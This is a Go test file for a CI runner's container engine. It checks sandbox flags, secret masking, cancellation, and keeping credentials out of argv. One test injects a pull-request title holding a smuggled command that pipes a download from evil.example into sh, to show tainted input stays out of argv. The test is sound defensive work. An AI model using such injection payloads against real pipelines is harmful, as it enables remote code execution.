Go · 20120 bytes Raw Blame History
1 // SPDX-License-Identifier: AGPL-3.0-or-later
2
3 package engine
4
5 import (
6 "context"
7 "errors"
8 "io"
9 "reflect"
10 "strings"
11 "sync"
12 "testing"
13 "time"
14 )
15
16 type recordingRunner struct {
17 name string
18 args []string
19 env []string
20 err error
21 }
22
23 func (r *recordingRunner) Run(_ context.Context, name string, args []string, env []string, _, _ io.Writer) error {
24 r.name = name
25 r.args = append([]string{}, args...)
26 r.env = append([]string{}, env...)
27 return r.err
28 }
29
30 type loggingRunner struct{}
31
32 func (loggingRunner) Run(_ context.Context, _ string, _ []string, _ []string, stdout, stderr io.Writer) error {
33 _, _ = stdout.Write([]byte("hello "))
34 _, _ = stderr.Write([]byte("world\n"))
35 return nil
36 }
37
38 type secretLoggingRunner struct{}
39
40 func (secretLoggingRunner) Run(_ context.Context, _ string, _ []string, _ []string, stdout, _ io.Writer) error {
41 _, _ = stdout.Write([]byte("hun"))
42 _, _ = stdout.Write([]byte("ter2\n"))
43 return nil
44 }
45
46 type cancellableRunner struct {
47 started chan struct{}
48 killed chan struct{}
49 killArgs []string
50 mu sync.Mutex
51 }
52
53 func newCancellableRunner() *cancellableRunner {
54 return &cancellableRunner{
55 started: make(chan struct{}),
56 killed: make(chan struct{}),
57 }
58 }
59
60 func (r *cancellableRunner) Run(ctx context.Context, _ string, args []string, _ []string, _, _ io.Writer) error {
61 if len(args) > 0 && args[0] == "kill" {
62 r.mu.Lock()
63 r.killArgs = append([]string{}, args...)
64 r.mu.Unlock()
65 close(r.killed)
66 return nil
67 }
68 close(r.started)
69 select {
70 case <-r.killed:
71 return context.Canceled
72 case <-ctx.Done():
73 return ctx.Err()
74 }
75 }
76
77 type timeoutRunner struct {
78 started chan struct{}
79 killed chan struct{}
80 killArgs []string
81 startOnce sync.Once
82 killOnce sync.Once
83 mu sync.Mutex
84 }
85
86 func newTimeoutRunner() *timeoutRunner {
87 return &timeoutRunner{
88 started: make(chan struct{}),
89 killed: make(chan struct{}),
90 }
91 }
92
93 func (r *timeoutRunner) Run(ctx context.Context, _ string, args []string, _ []string, _, _ io.Writer) error {
94 if len(args) > 0 && args[0] == "kill" {
95 r.mu.Lock()
96 r.killArgs = append([]string{}, args...)
97 r.mu.Unlock()
98 r.killOnce.Do(func() { close(r.killed) })
99 return nil
100 }
101 r.startOnce.Do(func() { close(r.started) })
102 <-ctx.Done()
103 return ctx.Err()
104 }
105
106 func TestDockerExecute_BuildsResourceCappedRunCommand(t *testing.T) {
107 t.Parallel()
108 rec := &recordingRunner{}
109 d := NewDocker(DockerConfig{
110 Binary: "podman",
111 DefaultImage: "runner-image",
112 Network: "none",
113 Memory: "2g",
114 CPUs: "2",
115 Runner: rec,
116 })
117 out, err := d.Execute(t.Context(), Job{
118 ID: 1,
119 RunID: 2,
120 WorkspaceDir: t.TempDir(),
121 Env: map[string]string{"A": "job"},
122 Steps: []Step{{
123 Index: 0,
124 Name: "test",
125 Run: "echo hi",
126 WorkingDirectory: "subdir",
127 Env: map[string]string{"B": "step"},
128 }},
129 })
130 if err != nil {
131 t.Fatalf("Execute: %v", err)
132 }
133 if out.Conclusion != ConclusionSuccess {
134 t.Fatalf("Conclusion: %q", out.Conclusion)
135 }
136 want := []string{
137 "run", "--rm", "--name", "shithub-job-1-step-0",
138 "--network=none", "--memory=2g", "--cpus=2",
139 "--pids-limit=512", "--read-only",
140 "--tmpfs", "/tmp:rw,exec,nosuid,nodev,size=1g",
141 "--cap-drop=ALL", "--cap-add=DAC_OVERRIDE", "--cap-add=SETGID", "--cap-add=SETUID",
142 "--security-opt=no-new-privileges", "--security-opt=seccomp=/etc/shithubd-runner/seccomp.json",
143 "--ulimit", "nofile=4096:4096", "--ulimit", "nproc=512:512",
144 "--user", "65534:65534",
145 "--workdir=/workspace/subdir",
146 "--mount", rec.args[25],
147 "--env", "A", "--env", "B",
148 "runner-image", "bash", "-c", "echo hi",
149 }
150 if rec.name != "podman" {
151 t.Fatalf("name: %s", rec.name)
152 }
153 if !reflect.DeepEqual(rec.args, want) {
154 t.Fatalf("args:\ngot %#v\nwant %#v", rec.args, want)
155 }
156 if !strings.HasPrefix(rec.args[25], "type=bind,src=") || !strings.HasSuffix(rec.args[25], ",dst=/workspace,rw") {
157 t.Fatalf("workspace mount arg: %q", rec.args[25])
158 }
159 if wantEnv := []string{"A=job", "B=step"}; !reflect.DeepEqual(rec.env, wantEnv) {
160 t.Fatalf("env:\ngot %#v\nwant %#v", rec.env, wantEnv)
161 }
162 }
163
164 func TestDockerExecute_RendersTaintedExpressionsThroughInputEnv(t *testing.T) {
165 t.Parallel()
166 rec := &recordingRunner{}
167 d := NewDocker(DockerConfig{
168 DefaultImage: "runner-image",
169 Network: "bridge",
170 Memory: "2g",
171 CPUs: "2",
172 Runner: rec,
173 })
174 malicious := `"; curl evil.example | sh #`
175 if _, err := d.Execute(t.Context(), Job{
176 ID: 1,
177 RunID: 2,
178 HeadSHA: "abc",
179 HeadRef: "refs/heads/trunk",
180 EventPayload: map[string]any{"pull_request": map[string]any{"title": malicious}},
181 WorkspaceDir: t.TempDir(),
182 Steps: []Step{{
183 Run: `echo "${{ shithub.event.pull_request.title }}"`,
184 }},
185 }); err != nil {
186 t.Fatalf("Execute: %v", err)
187 }
188 if got := rec.args[len(rec.args)-1]; got != `echo "${SHITHUB_INPUT_0}"` {
189 t.Fatalf("rendered command: %q", got)
190 }
191 if !containsFlagValue(rec.args, "--env", "SHITHUB_INPUT_0") {
192 t.Fatalf("input binding missing from args: %#v", rec.args)
193 }
194 if containsSubstring(rec.args, malicious) {
195 t.Fatalf("tainted input leaked into argv: %#v", rec.args)
196 }
197 if !containsEnv(rec.env, "SHITHUB_INPUT_0="+malicious) {
198 t.Fatalf("input binding missing from process env: %#v", rec.env)
199 }
200 }
201
202 func TestDockerExecute_RendersSecretsThroughEnvWithoutArgvLeak(t *testing.T) {
203 t.Parallel()
204 rec := &recordingRunner{}
205 d := NewDocker(DockerConfig{
206 DefaultImage: "runner-image",
207 Network: "bridge",
208 Memory: "2g",
209 CPUs: "2",
210 Runner: rec,
211 })
212 const secret = "hunter2"
213 if _, err := d.Execute(t.Context(), Job{
214 ID: 1,
215 RunID: 2,
216 Secrets: map[string]string{"TOKEN": secret},
217 WorkspaceDir: t.TempDir(),
218 Steps: []Step{{
219 Run: `printf '%s\n' "${{ secrets.TOKEN }}"`,
220 }},
221 }); err != nil {
222 t.Fatalf("Execute: %v", err)
223 }
224 if got := rec.args[len(rec.args)-1]; got != `printf '%s\n' "${SHITHUB_INPUT_0}"` {
225 t.Fatalf("rendered command: %q", got)
226 }
227 if !containsFlagValue(rec.args, "--env", "SHITHUB_INPUT_0") {
228 t.Fatalf("secret binding missing from args: %#v", rec.args)
229 }
230 if containsSubstring(rec.args, secret) {
231 t.Fatalf("secret leaked into argv: %#v", rec.args)
232 }
233 if !containsEnv(rec.env, "SHITHUB_INPUT_0="+secret) {
234 t.Fatalf("secret binding missing from process env: %#v", rec.env)
235 }
236 }
237
238 func TestDockerExecute_RootRequiresExplicitPermission(t *testing.T) {
239 t.Parallel()
240 for _, tc := range []struct {
241 name string
242 permissions string
243 wantUser string
244 }{
245 {name: "default", permissions: `{}`, wantUser: "65534:65534"},
246 {name: "write-all-does-not-root", permissions: `{"mode":"write-all"}`, wantUser: "65534:65534"},
247 {name: "explicit-root-disabled-by-default", permissions: `{"per":{"shithub-runner-root":"write"}}`, wantUser: "65534:65534"},
248 } {
249 t.Run(tc.name, func(t *testing.T) {
250 t.Parallel()
251 rec := &recordingRunner{}
252 d := NewDocker(DockerConfig{
253 DefaultImage: "runner-image",
254 Network: "bridge",
255 Memory: "2g",
256 CPUs: "2",
257 Runner: rec,
258 })
259 if _, err := d.Execute(t.Context(), Job{
260 ID: 1,
261 Permissions: []byte(tc.permissions),
262 WorkspaceDir: t.TempDir(),
263 Steps: []Step{{Run: "id -u"}},
264 }); err != nil {
265 t.Fatalf("Execute: %v", err)
266 }
267 if got := argAfter(rec.args, "--user"); got != tc.wantUser {
268 t.Fatalf("--user: got %q want %q in %#v", got, tc.wantUser, rec.args)
269 }
270 })
271 }
272 }
273
274 func TestDockerExecute_AllowRootEnablesExplicitRootPermission(t *testing.T) {
275 t.Parallel()
276 rec := &recordingRunner{}
277 d := NewDocker(DockerConfig{
278 DefaultImage: "runner-image",
279 Network: "bridge",
280 Memory: "2g",
281 CPUs: "2",
282 AllowRoot: true,
283 Runner: rec,
284 })
285 if _, err := d.Execute(t.Context(), Job{
286 ID: 1,
287 Permissions: []byte(`{"per":{"shithub-runner-root":"write"}}`),
288 WorkspaceDir: t.TempDir(),
289 Steps: []Step{{Run: "id -u"}},
290 }); err != nil {
291 t.Fatalf("Execute: %v", err)
292 }
293 if got := argAfter(rec.args, "--user"); got != "0:0" {
294 t.Fatalf("--user: got %q want %q in %#v", got, "0:0", rec.args)
295 }
296 }
297
298 func TestDockerExecute_AddsConfiguredDNSServers(t *testing.T) {
299 t.Parallel()
300 rec := &recordingRunner{}
301 d := NewDocker(DockerConfig{
302 DefaultImage: "runner-image",
303 Network: "actions-net",
304 Memory: "2g",
305 CPUs: "2",
306 DNSServers: []string{"172.30.0.10", "172.30.0.11"},
307 Runner: rec,
308 })
309 if _, err := d.Execute(t.Context(), Job{
310 ID: 1,
311 WorkspaceDir: t.TempDir(),
312 Steps: []Step{{Run: "curl https://github.com"}},
313 }); err != nil {
314 t.Fatalf("Execute: %v", err)
315 }
316 if argAfterN(rec.args, "--dns", 0) != "172.30.0.10" || argAfterN(rec.args, "--dns", 1) != "172.30.0.11" {
317 t.Fatalf("dns args missing: %#v", rec.args)
318 }
319 }
320
321 func TestDockerExecute_StreamsStepLogs(t *testing.T) {
322 t.Parallel()
323 d := NewDocker(DockerConfig{
324 DefaultImage: "runner-image",
325 Network: "bridge",
326 Memory: "2g",
327 CPUs: "2",
328 LogChunkBytes: 4,
329 Runner: loggingRunner{},
330 })
331 logs, err := d.StreamLogs(t.Context(), 99)
332 if err != nil {
333 t.Fatalf("StreamLogs: %v", err)
334 }
335 out, err := d.Execute(t.Context(), Job{
336 ID: 99,
337 WorkspaceDir: t.TempDir(),
338 Steps: []Step{{ID: 123, Run: "echo hi"}},
339 })
340 if err != nil {
341 t.Fatalf("Execute: %v", err)
342 }
343 if len(out.StepOutcomes) != 1 || out.StepOutcomes[0].StepID != 123 {
344 t.Fatalf("StepOutcomes: %#v", out.StepOutcomes)
345 }
346 var got []LogChunk
347 for chunk := range logs {
348 got = append(got, chunk)
349 }
350 if len(got) == 0 {
351 t.Fatal("no log chunks streamed")
352 }
353 if got[0].JobID != 99 || got[0].StepID != 123 || got[0].Seq != 0 {
354 t.Fatalf("first chunk: %#v", got[0])
355 }
356 }
357
358 func TestDockerExecute_ScrubsStepLogsAcrossChunkBoundary(t *testing.T) {
359 t.Parallel()
360 d := NewDocker(DockerConfig{
361 DefaultImage: "runner-image",
362 Network: "bridge",
363 Memory: "2g",
364 CPUs: "2",
365 LogChunkBytes: 3,
366 Runner: secretLoggingRunner{},
367 })
368 logs, err := d.StreamLogs(t.Context(), 99)
369 if err != nil {
370 t.Fatalf("StreamLogs: %v", err)
371 }
372 if _, err := d.Execute(t.Context(), Job{
373 ID: 99,
374 WorkspaceDir: t.TempDir(),
375 MaskValues: []string{"hunter2"},
376 Steps: []Step{{ID: 123, Run: "echo secret"}},
377 }); err != nil {
378 t.Fatalf("Execute: %v", err)
379 }
380 var got string
381 for chunk := range logs {
382 got += string(chunk.Chunk)
383 }
384 if got != "***\n" {
385 t.Fatalf("logs: %q", got)
386 }
387 }
388
389 func TestDockerExecute_StreamsOrderedEvents(t *testing.T) {
390 t.Parallel()
391 d := NewDocker(DockerConfig{
392 DefaultImage: "runner-image",
393 Network: "bridge",
394 Memory: "2g",
395 CPUs: "2",
396 LogFlushInterval: time.Hour,
397 Runner: loggingRunner{},
398 })
399 events, err := d.StreamEvents(t.Context(), 99)
400 if err != nil {
401 t.Fatalf("StreamEvents: %v", err)
402 }
403 if _, err := d.Execute(t.Context(), Job{
404 ID: 99,
405 WorkspaceDir: t.TempDir(),
406 Steps: []Step{{ID: 123, Run: "echo hi"}},
407 }); err != nil {
408 t.Fatalf("Execute: %v", err)
409 }
410 var got []Event
411 for event := range events {
412 got = append(got, event)
413 }
414 if len(got) != 2 {
415 t.Fatalf("events: %#v", got)
416 }
417 if got[0].Log == nil || string(got[0].Log.Chunk) != "hello world\n" {
418 t.Fatalf("first event: %#v", got[0])
419 }
420 if got[1].Step == nil || got[1].Step.StepID != 123 || got[1].Step.Conclusion != ConclusionSuccess {
421 t.Fatalf("second event: %#v", got[1])
422 }
423 }
424
425 func TestDockerCancelKillsActiveContainer(t *testing.T) {
426 t.Parallel()
427 rec := newCancellableRunner()
428 d := NewDocker(DockerConfig{
429 DefaultImage: "runner-image",
430 Network: "bridge",
431 Memory: "2g",
432 CPUs: "2",
433 Runner: rec,
434 })
435 type executeResult struct {
436 out Outcome
437 err error
438 }
439 done := make(chan executeResult, 1)
440 go func() {
441 out, err := d.Execute(t.Context(), Job{
442 ID: 99,
443 WorkspaceDir: t.TempDir(),
444 Steps: []Step{{ID: 123, Run: "sleep 600"}},
445 })
446 done <- executeResult{out: out, err: err}
447 }()
448 <-rec.started
449 if err := d.Cancel(t.Context(), 99); err != nil {
450 t.Fatalf("Cancel: %v", err)
451 }
452 res := <-done
453 if !errors.Is(res.err, context.Canceled) {
454 t.Fatalf("Execute error: %v", res.err)
455 }
456 if res.out.Conclusion != ConclusionCancelled {
457 t.Fatalf("Conclusion: %q", res.out.Conclusion)
458 }
459 rec.mu.Lock()
460 killArgs := append([]string{}, rec.killArgs...)
461 rec.mu.Unlock()
462 want := []string{"kill", "shithub-job-99-step-123"}
463 if !reflect.DeepEqual(killArgs, want) {
464 t.Fatalf("kill args: got %#v want %#v", killArgs, want)
465 }
466 }
467
468 func TestDockerExecute_TimeoutKillsActiveContainerAndReportsTimedOut(t *testing.T) {
469 t.Parallel()
470 rec := newTimeoutRunner()
471 d := NewDocker(DockerConfig{
472 DefaultImage: "runner-image",
473 Network: "bridge",
474 Memory: "2g",
475 CPUs: "2",
476 Runner: rec,
477 TimeoutMinute: time.Millisecond,
478 LogChunkBytes: 4,
479 StepLogLimit: 1024,
480 LogFlushInterval: time.Hour,
481 })
482 events, err := d.StreamEvents(t.Context(), 99)
483 if err != nil {
484 t.Fatalf("StreamEvents: %v", err)
485 }
486 out, err := d.Execute(t.Context(), Job{
487 ID: 99,
488 TimeoutMinutes: 1,
489 WorkspaceDir: t.TempDir(),
490 Steps: []Step{{ID: 123, Run: "sleep 600", ContinueOnError: true}},
491 })
492 if !errors.Is(err, ErrJobTimedOut) {
493 t.Fatalf("Execute error: got %v, want ErrJobTimedOut", err)
494 }
495 if out.Conclusion != ConclusionTimedOut {
496 t.Fatalf("Conclusion: %q", out.Conclusion)
497 }
498 if len(out.StepOutcomes) != 1 ||
499 out.StepOutcomes[0].StepID != 123 ||
500 out.StepOutcomes[0].Status != "completed" ||
501 out.StepOutcomes[0].Conclusion != ConclusionTimedOut {
502 t.Fatalf("StepOutcomes: %#v", out.StepOutcomes)
503 }
504 select {
505 case <-rec.killed:
506 case <-time.After(time.Second):
507 t.Fatal("timeout did not kill active container")
508 }
509 rec.mu.Lock()
510 killArgs := append([]string{}, rec.killArgs...)
511 rec.mu.Unlock()
512 want := []string{"kill", "shithub-job-99-step-123"}
513 if !reflect.DeepEqual(killArgs, want) {
514 t.Fatalf("kill args: got %#v want %#v", killArgs, want)
515 }
516 var got []Event
517 for event := range events {
518 got = append(got, event)
519 }
520 if len(got) != 1 || got[0].Step == nil || got[0].Step.Conclusion != ConclusionTimedOut {
521 t.Fatalf("timeout step event: %#v", got)
522 }
523 }
524
525 func TestDockerExecute_FailureMapsToFailureConclusion(t *testing.T) {
526 t.Parallel()
527 d := NewDocker(DockerConfig{
528 DefaultImage: "runner-image",
529 Network: "bridge",
530 Memory: "2g",
531 CPUs: "2",
532 Runner: &recordingRunner{err: errors.New("exit 1")},
533 })
534 out, err := d.Execute(t.Context(), Job{
535 WorkspaceDir: t.TempDir(),
536 Steps: []Step{{Run: "exit 1"}},
537 })
538 if err == nil {
539 t.Fatal("Execute returned nil error")
540 }
541 if out.Conclusion != ConclusionFailure {
542 t.Fatalf("Conclusion: %q", out.Conclusion)
543 }
544 }
545
546 func TestDockerExecute_ContinueOnErrorContinues(t *testing.T) {
547 t.Parallel()
548 rec := &recordingRunner{err: errors.New("exit 1")}
549 d := NewDocker(DockerConfig{
550 DefaultImage: "runner-image",
551 Network: "bridge",
552 Memory: "2g",
553 CPUs: "2",
554 Runner: rec,
555 })
556 out, err := d.Execute(t.Context(), Job{
557 WorkspaceDir: t.TempDir(),
558 Steps: []Step{{Run: "exit 1", ContinueOnError: true}},
559 })
560 if err != nil {
561 t.Fatalf("Execute: %v", err)
562 }
563 if out.Conclusion != ConclusionSuccess {
564 t.Fatalf("Conclusion: %q", out.Conclusion)
565 }
566 }
567
568 func TestDockerExecute_RejectsUnsupportedUses(t *testing.T) {
569 t.Parallel()
570 d := NewDocker(DockerConfig{DefaultImage: "runner-image", Network: "bridge", Memory: "2g", CPUs: "2", Runner: &recordingRunner{}})
571 out, err := d.Execute(t.Context(), Job{
572 WorkspaceDir: t.TempDir(),
573 Steps: []Step{{Uses: "shithub/upload-artifact@v1"}},
574 })
575 if !errors.Is(err, ErrUnsupportedUses) {
576 t.Fatalf("error: %v", err)
577 }
578 if out.Conclusion != ConclusionFailure {
579 t.Fatalf("Conclusion: %q", out.Conclusion)
580 }
581 }
582
583 type checkoutRunner struct {
584 calls []checkoutCall
585 }
586
587 type checkoutCall struct {
588 name string
589 args []string
590 env []string
591 }
592
593 func (r *checkoutRunner) Run(_ context.Context, name string, args []string, env []string, stdout, _ io.Writer) error {
594 r.calls = append(r.calls, checkoutCall{
595 name: name,
596 args: append([]string{}, args...),
597 env: append([]string{}, env...),
598 })
599 if len(args) >= 4 && args[len(args)-2] == "rev-parse" && args[len(args)-1] == "HEAD" {
600 _, _ = stdout.Write([]byte("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n"))
601 }
602 return nil
603 }
604
605 func TestDockerExecute_CheckoutUsesScopedCredentialAndVerifiesHead(t *testing.T) {
606 t.Parallel()
607 rec := &checkoutRunner{}
608 d := NewDocker(DockerConfig{
609 GitBinary: "git-test",
610 DefaultImage: "runner-image",
611 Network: "bridge",
612 Memory: "2g",
613 CPUs: "2",
614 LogChunkBytes: 1024,
615 Runner: rec,
616 })
617 out, err := d.Execute(t.Context(), Job{
618 ID: 1,
619 RunID: 2,
620 CheckoutURL: "https://shithub.test/alice/demo.git",
621 CheckoutToken: "checkout-token",
622 HeadSHA: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
623 HeadRef: "refs/heads/trunk",
624 WorkspaceDir: t.TempDir(),
625 Steps: []Step{{
626 ID: 10,
627 Uses: "actions/checkout@v4",
628 With: map[string]string{"fetch-depth": "0"},
629 }},
630 })
631 if err != nil {
632 t.Fatalf("Execute: %v", err)
633 }
634 if out.Conclusion != ConclusionSuccess {
635 t.Fatalf("Conclusion: %q", out.Conclusion)
636 }
637 if len(rec.calls) != 5 {
638 t.Fatalf("git calls: got %d want 5: %#v", len(rec.calls), rec.calls)
639 }
640 want := [][]string{
641 {"-C", rec.calls[0].args[1], "init"},
642 {"-C", rec.calls[1].args[1], "remote", "add", "origin", "https://shithub.test/alice/demo.git"},
643 {"-C", rec.calls[2].args[1], "-c", rec.calls[2].args[3], "fetch", "--no-tags", "origin", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"},
644 {"-C", rec.calls[3].args[1], "checkout", "--force", "--detach", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"},
645 {"-C", rec.calls[4].args[1], "rev-parse", "HEAD"},
646 }
647 for i := range want {
648 if rec.calls[i].name != "git-test" {
649 t.Fatalf("call %d name = %q", i, rec.calls[i].name)
650 }
651 if !reflect.DeepEqual(rec.calls[i].args, want[i]) {
652 t.Fatalf("call %d args:\ngot %#v\nwant %#v", i, rec.calls[i].args, want[i])
653 }
654 }
655 if strings.Contains(strings.Join(rec.calls[2].args, " "), "checkout-token") {
656 t.Fatalf("checkout token leaked into argv: %#v", rec.calls[2].args)
657 }
658 if !containsEnv(rec.calls[2].env, "SHITHUB_CHECKOUT_TOKEN=checkout-token") {
659 t.Fatalf("checkout token missing from git env: %#v", rec.calls[2].env)
660 }
661 if rec.calls[2].args[3] != `credential.helper=!f() { echo username=shithub-actions; echo password=$SHITHUB_CHECKOUT_TOKEN; }; f` {
662 t.Fatalf("credential helper: %q", rec.calls[2].args[3])
663 }
664 }
665
666 func TestCheckoutDepthArgsRejectsUnsupportedInputs(t *testing.T) {
667 t.Parallel()
668 if _, err := checkoutDepthArgs(map[string]string{"path": "src"}); err == nil || !strings.Contains(err.Error(), `unsupported checkout input "path"`) {
669 t.Fatalf("checkoutDepthArgs error = %v", err)
670 }
671 }
672
673 func TestContainerWorkdirRejectsEscapes(t *testing.T) {
674 t.Parallel()
675 for _, wd := range []string{"../x", "/tmp"} {
676 if _, err := containerWorkdir(wd); err == nil {
677 t.Fatalf("containerWorkdir(%q) returned nil error", wd)
678 }
679 }
680 }
681
682 func containsFlagValue(args []string, flag, value string) bool {
683 for i, arg := range args {
684 if arg == flag && i+1 < len(args) && args[i+1] == value {
685 return true
686 }
687 }
688 return false
689 }
690
691 func containsSubstring(args []string, substr string) bool {
692 for _, arg := range args {
693 if strings.Contains(arg, substr) {
694 return true
695 }
696 }
697 return false
698 }
699
700 func containsEnv(env []string, want string) bool {
701 for _, item := range env {
702 if item == want {
703 return true
704 }
705 }
706 return false
707 }
708
709 func argAfter(args []string, flag string) string {
710 for i, arg := range args {
711 if arg == flag && i+1 < len(args) {
712 return args[i+1]
713 }
714 }
715 return ""
716 }
717
718 func argAfterN(args []string, flag string, n int) string {
719 for i, arg := range args {
720 if arg == flag {
721 if n == 0 && i+1 < len(args) {
722 return args[i+1]
723 }
724 n--
725 }
726 }
727 return ""
728 }
729